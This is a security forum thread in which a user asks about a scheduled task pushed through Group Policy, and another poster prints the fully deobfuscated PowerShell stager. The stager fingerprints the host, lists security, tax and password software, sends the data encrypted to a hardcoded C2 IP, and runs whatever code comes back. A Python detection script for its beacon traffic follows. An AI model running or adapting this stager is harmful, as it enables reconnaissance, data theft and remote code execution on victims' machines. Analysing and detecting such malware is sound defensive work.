A Memory Resident Virus ?

Ask your beginner questions here.
4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

A Memory Resident Virus ?

Post by 4everyone » Sun Jan 14, 2018 7:46 am

Happy New Year Folks !

I'm going through a situation where a scheduled task is getting deployed through the Domain Controller to the workstation, and the task is running wscript + PowerShell using a download link which is displayed in the scheduled task script.

Link is - http://192.96.206.191:9097/static/ka7ds ... AHSGA656gh

The above link has some code. Not sure what it's capable of or what this script actually does. Can someone let me know what the purpose of the above script is? Appreciate your help in advance.

Thanks
4Everyone

xors
Posts: 160
Joined: Mon May 23, 2016 2:01 am

Re: A Memory Resident Virus ?

Post by xors » Sun Jan 14, 2018 12:00 pm

Can you add the script here as an attachment? :)
@xorsthingsv2

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Sun Jan 14, 2018 4:33 pm

Thanks for your reply. Here you go.

N3mes1s
Posts: 42
Joined: Wed Mar 09, 2011 5:17 pm

Re: A Memory Resident Virus ?

Post by N3mes1s » Mon Jan 15, 2018 5:18 pm

Hello.
This is pretty interesting, seems to be a recon script (I dunno if it's a known one and don't have time to check) in PowerShell. After multiple layers obfuscated with Invoke-Obfuscation and various downloads from the same IP, this is the code.

It is self-explanatory at this stage, just read the function names :)

Code:

function GsdsetWweter {
    $Serv = $args[0]
    $SK = $args[1]
    $USAG = $args[2]
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
    $ErrorActionPreference = "SilentlyContinue";
    $e=[System.Text.Encoding]::ASCII;
    function Get-SysID($HashName = "MD5"){
        [string]$ret = ""
        $hd = gwmi win32_bios
        $ret = $hd["SerialNumber"].ToString()
        [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
        $StringBuilder = New-Object System.Text.StringBuilder 
        [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ 
            [Void]$StringBuilder.Append($_.ToString("x2")) 
            } 
            $e = $StringBuilder.ToString().ToLower()
            $e
        }
  Function HasGet-Bretring($ht) { 
  $first = $true
  foreach($pair in $ht.GetEnumerator()) { 
    if ($first) 
    {
       $first = $false
    } 
    else 
    {
       $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
   } 
   $output
  }

 function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
    ForEach-Object {
      $result = 1 | Select-Object Name, IP, MAC, ID
      $result.Name = $_.Name
      $result.MAC = $_.MacAddress
      $result.ID = $_.DeviceID
      $config = $_.GetRelated('Win32_NetworkAdapterConfiguration') 
      $result.IP = $config | Select-Object -expand IPAddress
      $result
    }
 
}
   
    function Get-Sysinfo {     
        $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; 
        $string = ""
        foreach($c in Get-workconfig){
            [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
            $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
            [string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
            $lanconf = @{
            id = $ID 
            ip = $ip;
            mac =  $macadr; 
            name = $lanname;
            }
           $string += HasGet-Bretring $lanconf 
           $string += "!"
        }

        $o = (Get-WmiObject Win32_OperatingSystem)        
        $str += "|$string";
        $str += '|' +$o.Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq "system"){
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
        $Screens = [system.windows.forms.screen]::AllScreens
        foreach ($Screen in $Screens) {                       
            $Width  = $Screen.Bounds.Width            
            $Height  = $Screen.Bounds.Height 
        }
        $str += '|' + "$Width`x$Height"
        $n = [System.Diagnostics.Process]::GetCurrentProcess()
        $str += '|'+$n.ProcessName+'|'+$n.Id
        $str += '|' + $PSVersionTable.PSVersion.Major
        $str += '|' + $ENV:PROCESSOR_ARCHITECTURE
        $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption 
        $str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
        $str
    }
    
function getlisturi{
    $RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
    $RandName + '.' + $ar
    }

    function Get-Soft {
    param (
        [Parameter(ValueFromPipeline=$true)]
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
    )
    foreach ($comp in $ComputerName) {
        $keys = '','\Wow6432Node'
        foreach ($key in $keys) {
            try {
                $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
            } catch {
                continue
            }
            foreach ($app in $apps) {
                $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
                $name = $program.GetValue('DisplayName')
                $str = ''
                if ($name -and $name -match $NameRegex) {
                    $str += $name + ';'
                    $str
                }
            }
        }
    }
}
            try {
                $FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;         }
            catch {
                $FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
            }
    $FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
    $FirstAES.Key=$e.GetBytes($SK);
    $FirstAES.IV = $FirstIV;
    $csp = New-Object System.Security.Cryptography.CspParameters;
    $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
    $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
    $rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
    $eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length); 
    $BotIDXor= Get-SysID;
    $EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
    $EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
  if(-not $wc){
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $wc=new-object system.net.WebClient;
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    }
    $wc.Headers.Add("User-Agent",$USAG);
    $wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
    $raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
    write-host "STAGER GET raw   "  $raw
    $de=$e.GetString($rs.decrypt($raw,$false));
    $key=$de[0..($de.length-2)] -join '';
    $k=$de[$de.length-1] -join '';
  if ($k -eq 0) {
    $str1 =  Get-Sysinfo;
    $str2 =  Get-Soft;
    $str = $str1 + '|' + $str2
    }
  else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
    $SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
    $SecondIV = [byte] 0..255 | Get-Random -count 16;
    $SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV; 
    $ib2=$e.getbytes($str);
    $eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
    $wc.Headers.Add("User-Agent",$USAG);
    $raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
    $AES.Mode="CBC";
    $IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
    $shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
    iex $shelles
    $FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
    $Error.Clear()
    [GC]::Collect()
    [GC]::WaitForPendingFinalizers()
    federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
    }
  GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'
https://ghostbin.com/paste/83av7
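As an added, defender-side example (my own code, not part of N3mes1s's post or the stager above), here is a small Python triage script that flags proxy records matching the beacon traits visible in the deobfuscated code (the 9/13-letter random URI from getlisturi, the fixed User-Agent, and the double-base64 SESSIONID cookie) and recovers the bot ID from that cookie. The tab-separated log layout and the sample records are constructed assumptions, not real traffic.

```python
import base64
import re

# Traits of the deobfuscated stager posted above (assumed to hold for this family only):
#   - getlisturi draws 9 or 13 letters from "abcdefghijklmoprstvuxyz" (no n, q, w) plus .php/.jsp/.asp
#   - the Cookie header is "SESSIONID:" + base64(base64(MD5 hex of user+host+BIOS serial))
#   - the same fixed User-Agent string is sent on every POST
ALPHABET = "abcdefghijklmoprstvuxyz"
URI_RE = re.compile(rf"^/[{ALPHABET}]{{9}}\.(?:php|jsp|asp)$|^/[{ALPHABET}]{{13}}\.(?:php|jsp|asp)$")
STAGER_UA = ("Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0")
COOKIE_RE = re.compile(r"SESSIONID:([A-Za-z0-9+/=]+)")


def decode_bot_id(cookie: str):
    """Undo the stager's double base64 and return the 32-hex bot ID, or None."""
    m = COOKIE_RE.search(cookie)
    if not m:
        return None
    try:
        inner = base64.b64decode(m.group(1), validate=True)
        bot_id = base64.b64decode(inner, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return bot_id if re.fullmatch(r"[0-9a-f]{32}", bot_id) else None


def analyse_line(line: str) -> dict:
    """Score one constructed tab-separated proxy record: method, path, user_agent, cookie."""
    method, path, ua, cookie = line.rstrip("\n").split("\t")
    hits = []
    if method == "POST" and URI_RE.match(path):
        hits.append("random-name uri")
    if ua == STAGER_UA:
        hits.append("stager user-agent")
    bot_id = decode_bot_id(cookie)
    if bot_id:
        hits.append("double-base64 SESSIONID")
    # A single trait is noisy (the UA mimics a real browser), so require two to alert.
    return {"suspicious": len(hits) >= 2, "indicators": hits, "bot_id": bot_id}


def encode_bot_id(bot_id: str) -> str:
    """Reproduce the stager's cookie encoding; used here only to build test records."""
    inner = base64.b64encode(bot_id.encode("ascii"))
    return "SESSIONID:" + base64.b64encode(inner).decode("ascii")


# Constructed sample records (not real traffic): one beacon, one benign browse.
SAMPLE_LOG = [
    "\t".join(["POST", "/kdsfhaetr.php", STAGER_UA, encode_bot_id("0123456789abcdef0123456789abcdef")]),
    "\t".join(["GET", "/index.php", STAGER_UA, "SESSIONID:abc123"]),
]
```

Run `analyse_line` over each record of a real proxy export after mapping its columns to the four fields; a recovered bot ID lets you tie beacons from several hosts to the same user/host/BIOS-serial hash.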

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Mon Jan 15, 2018 7:48 pm

Thanks for your time looking in to this N3mes1s.

Regards,
4Everyone

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Fri Jan 19, 2018 6:04 pm

Hi N3mes1s,

I found another obfuscated code running through the GP. Can you please decode this for me, so that I will be able to get what it does?


4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Fri Jan 19, 2018 10:57 pm

Don't worry about it. I got it figured out. Cheers!
